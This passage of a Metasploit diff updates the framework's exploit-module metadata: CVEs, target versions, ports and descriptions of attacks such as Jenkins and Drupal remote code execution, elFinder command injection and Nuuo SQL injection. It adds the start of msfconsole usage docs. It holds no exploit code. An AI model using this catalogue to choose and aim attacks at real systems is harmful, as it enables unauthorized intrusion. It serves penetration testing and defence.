    "is_install_path": true,
    "ref_name": "scanner/smb/smb_lookupsid",
@@ -35359,7 +35438,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_uninit_cred.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_uninit_cred",
@@ -36416,7 +36495,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-12-12 15:36:32 +0000",
+    "mod_time": "2019-03-05 17:21:11 +0000",
    "path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/libssh_auth_bypass",
@@ -36562,7 +36641,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-12-12 13:38:58 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login_pubkey",
@@ -37013,7 +37092,7 @@
      "telnet"
    ],
    "targets": null,
-    "mod_time": "2018-12-12 13:38:58 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/telnet/telnet_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_login",
@@ -38241,7 +38320,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-02-28 15:03:04 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_cmd",
@@ -38980,7 +39059,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-11-17 21:17:12 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/server/capture/printjob_capture.rb",
    "is_install_path": true,
    "ref_name": "server/capture/printjob_capture",
@@ -40001,7 +40080,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-06-04 15:27:20 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/sniffer/psnuffle.rb",
    "is_install_path": true,
    "ref_name": "sniffer/psnuffle",
@@ -41124,7 +41203,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2019-03-05 04:43:37 +0000",
    "path": "/modules/auxiliary/voip/sip_deregister.rb",
    "is_install_path": true,
    "ref_name": "voip/sip_deregister",
@@ -41158,7 +41237,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 04:43:37 +0000",
    "path": "/modules/auxiliary/voip/sip_invite_spoof.rb",
    "is_install_path": true,
    "ref_name": "voip/sip_invite_spoof",
@@ -43188,6 +43267,45 @@
    "notes": {
    }
  },
+  "exploit_android/local/su_exec": {
+    "name": "Android 'su' Privilege Escalation",
+    "full_name": "exploit/android/local/su_exec",
+    "rank": 0,
+    "disclosure_date": "2017-08-31",
+    "type": "exploit",
+    "author": [
+
+    ],
+    "description": "This module uses the su binary present on rooted devices to run\n          a payload as root.\n\n          A rooted Android device will contain a su binary (often linked with\n          an application) that allows the user to run commands as root.\n          This module will use the su binary to execute a command stager\n          as root. The command stager will write a payload binary to a\n          temporary directory, make it executable, execute it in the background,\n          and finally delete the executable.\n\n          On most devices the su binary will pop-up a prompt on the device\n          asking the user for permission.",
+    "references": [
+
+    ],
+    "platform": "Android,Linux",
+    "arch": "aarch64, armle, x86, x64, mipsle",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "aarch64",
+      "armle",
+      "x86",
+      "x64",
+      "mipsle"
+    ],
+    "mod_time": "2018-10-01 17:50:33 +0000",
+    "path": "/modules/exploits/android/local/su_exec.rb",
+    "is_install_path": true,
+    "ref_name": "android/local/su_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_apple_ios/browser/safari_libtiff": {
    "name": "Apple iOS MobileSafari LibTIFF Buffer Overflow",
    "full_name": "exploit/apple_ios/browser/safari_libtiff",
@@ -43605,6 +43723,53 @@
    "notes": {
    }
  },
+  "exploit_freebsd/local/intel_sysret_priv_esc": {
+    "name": "FreeBSD Intel SYSRET Privilege Escalation",
+    "full_name": "exploit/freebsd/local/intel_sysret_priv_esc",
+    "rank": 500,
+    "disclosure_date": "2012-06-12",
+    "type": "exploit",
+    "author": [
+      "Rafal Wojtczuk",
+      "John Baldwin",
+      "iZsh",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a vulnerability in the FreeBSD kernel,\n        when running on 64-bit Intel processors.\n\n        By design, 64-bit processors following the X86-64 specification will\n        trigger a general protection fault (GPF) when executing a SYSRET\n        instruction with a non-canonical address in the RCX register.\n\n        However, Intel processors check for a non-canonical address prior to\n        dropping privileges, causing a GPF in privileged mode. As a result,\n        the current userland RSP stack pointer is restored and executed,\n        resulting in privileged code execution.\n\n        This module has been tested successfully on:\n\n        FreeBSD 8.3-RELEASE (amd64); and\n        FreeBSD 9.0-RELEASE (amd64).",
+    "references": [
+      "BID-53856",
+      "CVE-2012-0217",
+      "EDB-28718",
+      "PACKETSTORM-113584",
+      "URL-https://www.freebsd.org/security/patches/SA-12:04/sysret.patch",
+      "URL-https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/",
+      "URL-https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c",
+      "URL-https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/",
+      "URL-http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc",
+      "URL-https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation"
+    ],
+    "platform": "BSD",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2018-12-21 15:40:01 +0000",
+    "path": "/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "freebsd/local/intel_sysret_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_freebsd/local/mmap": {
    "name": "FreeBSD 9 Address Space Manipulation Privilege Escalation",
    "full_name": "exploit/freebsd/local/mmap",
@@ -47067,6 +47232,50 @@
    "notes": {
    }
  },
+  "exploit_linux/http/imperva_securesphere_exec": {
+    "name": "Imperva SecureSphere PWS Command Injection",
+    "full_name": "exploit/linux/http/imperva_securesphere_exec",
+    "rank": 600,
+    "disclosure_date": "2018-10-08",
+    "type": "exploit",
+    "author": [
+      "rsp3ar <lukunming<at>gmail.com"
+    ],
+    "description": "This module exploits a command injection vulnerability in Imperva\n          SecureSphere 13.x. The vulnerability exists in the PWS service,\n          where Python CGIs didn't properly sanitize user supplied command\n          parameters and directly passes them to corresponding CLI utility,\n          leading to command injection. Agent registration credential is\n          required to exploit SecureSphere in gateway mode.\n\n          This module was successfully tested on Imperva SecureSphere 13.0/13.1/\n          13.2 in pre-ftl mode and unsealed gateway mode.",
+    "references": [
+      "EDB-45542"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Imperva SecureSphere 13.0/13.1/13.2"
+    ],
+    "mod_time": "2019-03-05 21:57:42 +0000",
+    "path": "/modules/exploits/linux/http/imperva_securesphere_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/imperva_securesphere_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_linux/http/ipfire_bashbug_exec": {
    "name": "IPFire Bash Environment Variable Injection (Shellshock)",
    "full_name": "exploit/linux/http/ipfire_bashbug_exec",
@@ -52556,7 +52765,8 @@
    "disclosure_date": "1983-01-01",
    "type": "exploit",
    "author": [
-      "h00die <mike@shorebreaksecurity.com>"
+      "h00die <mike@shorebreaksecurity.com>",
+      "Cale Black"
    ],
    "description": "This module will create a service on the box, and mark it for auto-restart.\n          We need enough access to write service files and potentially restart services\n          Targets:\n            System V:\n              CentOS <= 5\n              Debian <= 6\n              Kali 2.0\n              Ubuntu <= 9.04\n            Upstart:\n              CentOS 6\n              Fedora >= 9, < 15\n              Ubuntu >= 9.10, <= 14.10\n            systemd:\n              CentOS 7\n              Debian >= 7, <=8\n              Fedora >= 15\n              Ubuntu >= 15.04\n          Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.",
    "references": [
@@ -52575,9 +52785,10 @@
      "Auto",
      "System V",
      "Upstart",
-      "systemd"
+      "systemd",
+      "systemd user"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-06 00:07:17 +0000",
    "path": "/modules/exploits/linux/local/service_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/service_persistence",
@@ -53515,7 +53726,7 @@
      "Steve Breen",
      "Dev Mohanty",
      "Louis Sato",
-      "William Vu",
+      "wvu <wvu@metasploit.com>",
      "juan vazquez <juan.vazquez@metasploit.com>",
      "Wei Chen"
    ],
@@ -53539,7 +53750,7 @@
    "targets": [
      "Jenkins 1.637"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-02-22 17:01:49 +0000",
    "path": "/modules/exploits/linux/misc/jenkins_java_deserialize.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/jenkins_java_deserialize",
@@ -55114,7 +55325,7 @@
      "TCP (typically older devices)",
      "UDP (typically newer devices)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-03-05 21:02:39 +0000",
    "path": "/modules/exploits/linux/telnet/netgear_telnetenable.rb",
    "is_install_path": true,
    "ref_name": "linux/telnet/netgear_telnetenable",
@@ -55174,7 +55385,8 @@
    "type": "exploit",
    "author": [
      "phikshun",
-      "wvu <wvu@metasploit.com>"
+      "wvu <wvu@metasploit.com>",
+      "nstarke"
    ],
    "description": "This module exploits a command injection in the Belkin Wemo UPnP API via\n        the SmartDevURL argument to the SetSmartDevInfo action.\n\n        This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo\n        devices are known to be affected, albeit on a different RPORT (49153).",
    "references": [
@@ -55208,7 +55420,7 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2019-02-19 13:22:38 +0000",
+    "mod_time": "2019-03-04 19:09:34 +0000",
    "path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/upnp/belkin_wemo_upnp_exec",
@@ -55221,7 +55433,11 @@
      ],
      "SideEffects": [
        "artifacts-on-disk"
-      ]
+      ],
+      "Reliablity": [
+        "repeatable-session"
+      ],
+      "NOCVE": "Patched in 2.00.8643"
    }
  },
  "exploit_linux/upnp/dlink_upnp_msearch_exec": {
@@ -57990,7 +58206,7 @@
      "Apache Jetspeed <= 2.3.0 (Linux)",
      "Apache Jetspeed <= 2.3.0 (Windows)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-02-25 11:32:06 +0000",
    "path": "/modules/exploits/multi/http/apache_jetspeed_file_upload.rb",
    "is_install_path": true,
    "ref_name": "multi/http/apache_jetspeed_file_upload",
@@ -60197,6 +60413,68 @@
    "notes": {
    }
  },
+  "exploit_multi/http/jenkins_metaprogramming": {
+    "name": "Jenkins ACL Bypass and Metaprogramming RCE",
+    "full_name": "exploit/multi/http/jenkins_metaprogramming",
+    "rank": 600,
+    "disclosure_date": "2019-01-08",
+    "type": "exploit",
+    "author": [
+      "Orange Tsai",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a vulnerability in Jenkins dynamic routing to\n        bypass the Overall/Read ACL and leverage Groovy metaprogramming to\n        download and execute a malicious JAR file.\n\n        The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work\n        on later versions of Jenkins.\n\n        Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.",
+    "references": [
+      "CVE-2019-1003000",
+      "CVE-2019-1003001",
+      "CVE-2019-1003002",
+      "EDB-46427",
+      "URL-https://jenkins.io/security/advisory/2019-01-08/",
+      "URL-https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html",
+      "URL-https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html",
+      "URL-https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc"
+    ],
+    "platform": "Java",
+    "arch": "java",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)"
+    ],
+    "mod_time": "2019-03-16 13:35:54 +0000",
+    "path": "/modules/exploits/multi/http/jenkins_metaprogramming.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/jenkins_metaprogramming",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    }
+  },
  "exploit_multi/http/jenkins_script_console": {
    "name": "Jenkins-CI Script-Console Java Execution",
    "full_name": "exploit/multi/http/jenkins_script_console",
@@ -62075,7 +62353,7 @@
      "OATS <= 12.4.0.2.0 (Windows)",
      "OATS <= 12.4.0.2.0 (Linux)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-02-25 11:35:34 +0000",
    "path": "/modules/exploits/multi/http/oracle_ats_file_upload.rb",
    "is_install_path": true,
    "ref_name": "multi/http/oracle_ats_file_upload",
@@ -64503,7 +64781,7 @@
      "Linux (Dropper)",
      "Windows (Dropper)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-02-25 11:13:41 +0000",
    "path": "/modules/exploits/multi/http/struts2_rest_xstream.rb",
    "is_install_path": true,
    "ref_name": "multi/http/struts2_rest_xstream",
@@ -66800,6 +67078,43 @@
    "notes": {
    }
  },
+  "exploit_multi/misc/bmc_patrol_cmd_exec": {
+    "name": "BMC Patrol Agent Privilege Escalation Cmd Execution",
+    "full_name": "exploit/multi/misc/bmc_patrol_cmd_exec",
+    "rank": 600,
+    "disclosure_date": "2019-01-17",
+    "type": "exploit",
+    "author": [
+      "b0yd"
+    ],
+    "description": "This module leverages the remote command execution feature provided by\n        the BMC Patrol Agent software. It can also be used to escalate privileges\n        on Windows hosts as the software runs as SYSTEM but only verfies that the password\n        of the provided user is correct. This also means if the software is running on a\n        domain controller, it can be used to escalate from a normal domain user to domain\n        admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses\n        powershell to execute the payload. The powershell version tends to timeout on\n        the first run so it may take multiple tries.",
+    "references": [
+      "CVE-2018-20735",
+      "URL-https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "",
+    "rport": 3181,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows Powershell Injected Shellcode",
+      "Generic Command Callback"
+    ],
+    "mod_time": "2019-03-09 12:22:04 +0000",
+    "path": "/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/bmc_patrol_cmd_exec",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    }
+  },
  "exploit_multi/misc/bmc_server_automation_rscd_nsh_rce": {
    "name": "BMC Server Automation RSCD Agent NSH Remote Command Execution",
    "full_name": "exploit/multi/misc/bmc_server_automation_rscd_nsh_rce",
@@ -72626,7 +72941,7 @@
    }
  },
  "exploit_unix/sonicwall/sonicwall_xmlrpc_rce": {
-    "name": "SonicWall Global Management System XMLRPC\n                 set_time_zone Unath RCE",
+    "name": "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE",
    "full_name": "exploit/unix/sonicwall/sonicwall_xmlrpc_rce",
    "rank": 600,
    "disclosure_date": "2016-07-22",
@@ -72661,7 +72976,7 @@
    "targets": [
      "SonicWall Global Management System Virtual Appliance"
    ],
-    "mod_time": "2018-07-30 14:06:33 +0000",
+    "mod_time": "2019-03-07 10:29:15 +0000",
    "path": "/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/sonicwall/sonicwall_xmlrpc_rce",
@@ -73603,7 +73918,7 @@
      "Drupal 8.x (Unix In-Memory)",
      "Drupal 8.x (Linux Dropper)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-03-05 18:58:11 +0000",
    "path": "/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/drupal_drupalgeddon2",
@@ -73662,6 +73977,71 @@
    "notes": {
    }
  },
+  "exploit_unix/webapp/drupal_restws_unserialize": {
+    "name": "Drupal RESTful Web Services unserialize() RCE",
+    "full_name": "exploit/unix/webapp/drupal_restws_unserialize",
+    "rank": 300,
+    "disclosure_date": "2019-02-20",
+    "type": "exploit",
+    "author": [
+      "Jasper Mattsson",
+      "Charles Fol",
+      "Rotem Reiss",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a PHP unserialize() vulnerability in Drupal RESTful\n        Web Services by sending a crafted request to the /node REST endpoint.\n\n        As per SA-CORE-2019-003, the initial remediation was to disable POST,\n        PATCH, and PUT, but Ambionics discovered that GET was also vulnerable\n        (albeit cached). Cached nodes can be exploited only once.\n\n        Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of\n        this alternate vector.\n\n        Drupal < 8.5.11 and < 8.6.10 are vulnerable.",
+    "references": [
+      "CVE-2019-6340",
+      "URL-https://www.drupal.org/sa-core-2019-003",
+      "URL-https://www.drupal.org/psa-2019-02-22",
+      "URL-https://www.ambionics.io/blog/drupal8-rce",
+      "URL-https://github.com/ambionics/phpggc",
+      "URL-https://twitter.com/jcran/status/1099206271901798400"
+    ],
+    "platform": "PHP,Unix",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix In-Memory"
+    ],
+    "mod_time": "2019-03-05 20:25:00 +0000",
+    "path": "/modules/exploits/unix/webapp/drupal_restws_unserialize.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/drupal_restws_unserialize",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliablity": [
+        "unreliable-session"
+      ],
+      "AKA": [
+        "SA-CORE-2019-003"
+      ]
+    }
+  },
  "exploit_unix/webapp/egallery_upload_exec": {
    "name": "EGallery PHP File Upload Vulnerability",
    "full_name": "exploit/unix/webapp/egallery_upload_exec",
@@ -73709,6 +74089,55 @@
    "notes": {
    }
  },
+  "exploit_unix/webapp/elfinder_php_connector_exiftran_cmd_injection": {
+    "name": "elFinder PHP Connector exiftran Command Injection",
+    "full_name": "exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection",
+    "rank": 600,
+    "disclosure_date": "2019-02-26",
+    "type": "exploit",
+    "author": [
+      "Thomas Chauchefoin",
+      "q3rv0",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a command injection vulnerability in elFinder\n        versions prior to 2.1.48.\n\n        The PHP connector component allows unauthenticated users to upload\n        files and perform file modification operations, such as resizing and\n        rotation of an image. The file name of uploaded files is not validated,\n        allowing shell metacharacters.\n\n        When performing image operations on JPEG files, the filename is passed\n        to the `exiftran` utility without appropriate sanitization, causing\n        shell commands in the file name to be executed, resulting in remote\n        command injection as the web server user.\n\n        The PHP connector is not enabled by default.\n\n        The system must have `exiftran` installed and in `$PATH`.\n\n        This module has been tested successfully on elFinder versions 2.1.47,\n        2.1.20 and 2.1.16 on Ubuntu.",
+    "references": [
+      "CVE-2019-9194",
+      "EDB-46481",
+      "URL-https://github.com/Studio-42/elFinder/releases/tag/2.1.48",
+      "URL-https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2019-03-09 04:41:51 +0000",
+    "path": "/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/elfinder_php_connector_exiftran_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_unix/webapp/flashchat_upload_exec": {
    "name": "FlashChat Arbitrary File Upload",
    "full_name": "exploit/unix/webapp/flashchat_upload_exec",
@@ -77409,6 +77838,52 @@
    "notes": {
    }
  },
+  "exploit_unix/webapp/webmin_upload_exec": {
+    "name": "Webmin Upload Authenticated RCE",
+    "full_name": "exploit/unix/webapp/webmin_upload_exec",
+    "rank": 600,
+    "disclosure_date": "2019-01-17",
+    "type": "exploit",
+    "author": [
+      "AkkuS <Özkan Mustafa Akkuş>",
+      "Ziconius <Kris.Anderson@immersivelabs.com>"
+    ],
+    "description": "This module exploits an arbitrary command execution vulnerability in Webmin\n        1.900 and lower versions. Any user authorized to the \"Upload and Download\"\n        module can execute arbitrary commands with root privileges.\n\n        In addition, if the 'Running Processes' (proc) privilege is set the user can\n        accurately determine which directory to upload to. Webmin application files\n        can be written/overwritten, which allows remote code execution. The module\n        has been tested successfully with Webmin 1.900 on Ubuntu v18.04.\n\n        Using GUESSUPLOAD attempts to use a default installation path in order to\n        trigger the exploit.",
+    "references": [
+      "EDB-46201",
+      "URL-https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 10000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Webmin <= 1.900"
+    ],
+    "mod_time": "2019-03-14 13:46:34 +0000",
+    "path": "/modules/exploits/unix/webapp/webmin_upload_exec.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/webmin_upload_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_unix/webapp/webtester_exec": {
    "name": "WebTester 5.x Command Execution",
    "full_name": "exploit/unix/webapp/webtester_exec",
@@ -100484,11 +100959,13 @@
    "disclosure_date": "2014-06-19",
    "type": "exploit",
    "author": [
-      "Nicholas Nam <nick@executionflow.org>"
+      "Nicholas Nam <nick@executionflow.org>",
+      "Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>"
    ],
-    "description": "This module exploits the embedded Lua interpreter in the admin web interface for\n        versions 4.3.8 and below. When supplying a specially crafted HTTP POST request\n        an attacker can use os.execute() to execute arbitrary system commands on\n        the target with SYSTEM privileges.",
+    "description": "This module exploits the embedded Lua interpreter in the admin web interface for\n        versions 3.0.0 and above. When supplying a specially crafted HTTP POST request\n        an attacker can use os.execute() to execute arbitrary system commands on\n        the target with SYSTEM privileges.",
    "references": [
-      "URL-http://www.wftpserver.com"
+      "URL-http://www.wftpserver.com",
+      "URL-https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -100509,9 +100986,9 @@
      "https"
    ],
    "targets": [
-      "Windows VBS Stager"
+      "Wing FTP Server >= 3.0.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-02-10 14:26:13 +0000",
    "path": "/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/wing_ftp_admin_exec",
@@ -116861,7 +117338,7 @@
    "targets": [
      "Win32 Universal (Generic DEP & ASLR Bypass)"
    ],
-    "mod_time": "2018-09-17 22:23:54 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/exploits/windows/misc/wireshark_packet_dect.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/wireshark_packet_dect",
@@ -118035,6 +118512,47 @@
    "notes": {
    }
  },
+  "exploit_windows/nuuo/nuuo_cms_sqli": {
+    "name": "Nuuo Central Management Authenticated SQL Server SQLi",
+    "full_name": "exploit/windows/nuuo/nuuo_cms_sqli",
+    "rank": 300,
+    "disclosure_date": "2018-10-11",
+    "type": "exploit",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>"
+    ],
+    "description": "The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.\n      This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is\n      installed by default, xp_cmdshell can be enabled and abused to achieve code execution.\n      This module will either use a provided session number (which can be guessed with an auxiliary\n      module) or attempt to login using a provided username and password - it will also try the\n      default credentials if nothing is provided.",
+    "references": [
+      "CVE-2018-18982",
+      "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
+      "URL-https://seclists.org/fulldisclosure/2019/Jan/51",
+      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": 5180,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Nuuo Central Management Server <= v2.10.0"
+    ],
+    "mod_time": "2019-02-21 09:43:44 +0000",
+    "path": "/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "windows/nuuo/nuuo_cms_sqli",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    }
+  },
  "exploit_windows/oracle/client_system_analyzer_upload": {
    "name": "Oracle Database Client System Analyzer Arbitrary File Upload",
    "full_name": "exploit/windows/oracle/client_system_analyzer_upload",
@@ -143161,7 +143679,7 @@
    "references": [

    ],
-    "platform": "AIX,Android,Apple_iOS,BSD,BSDi,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unix,Unknown,Windows",
+    "platform": "AIX,Android,Apple_iOS,BSD,BSDi,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
@@ -0,0 +1,53 @@
+msfconsole
+==========
+
+`msfconsole` is the primary interface to Metasploit Framework. There is quite a
+lot that needs go here, please be patient and keep an eye on this space!
+
+Building ranges and lists
+-------------------------
+
+Many commands and options that take a list of things can use ranges to avoid
+having to manually list each desired thing. All ranges are inclusive.
+
+### Ranges of IDs
+
+Commands that take a list of IDs can use ranges to help. Individual IDs must be
+separated by a `,` (no space allowed) and ranges can be expressed with either
+`-` or `..`.
+
+### Ranges of IPs
+
+There are several ways to specify ranges of IP addresses that can be mixed
+together. The first way is a list of IPs separated by just a ` ` (ASCII space),
+with an optional `,`. The next way is two complete IP addresses in the form of
+`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
+specifications may also be used, however the whole address must be given to
+Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
+Additionally, a netmask can be used in conjunction with a domain name to
+dynamically resolve which block to target. All these methods work for both IPv4
+and IPv6 addresses. IPv4 addresses can also be specified with special octet
+ranges from the [NMAP target
+specification](https://nmap.org/book/man-target-specification.html)
+
+### Examples
+
+Terminate the first sessions:
+
+    sessions -k 1
+
+Stop some extra running jobs:
+
+    jobs -k 2-6,7,8,11..15
+
+Check a set of IP addresses:
+
+    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255
+
+Target a set of IPv6 hosts:
+
+    set RHOSTS fe80::3990:0000/110, ::1-::f0f0
+
+Target a block from a resolved domain name:
+
+    set RHOSTS www.example.test/24
@@ -0,0 +1,124 @@
+Jobs
+====
+
+The `jobs` command is used to interact with modules running in the
+background. Using jobs allows you to run multiple modules at once, like
+multiple `exploit/multi/hander` runs with different options to listen
+for different payloads to call back. Framework automatically starts
+modules that wait for something to happen ("passive modules") as jobs,
+and `run -j` will start any module as a job. When a module is started
+as a job, you will see a message like `[*] Exploit running as
+background job X.`. You will then be able to continue interacting with
+Metasploit as normal, and output from the module will continue to be
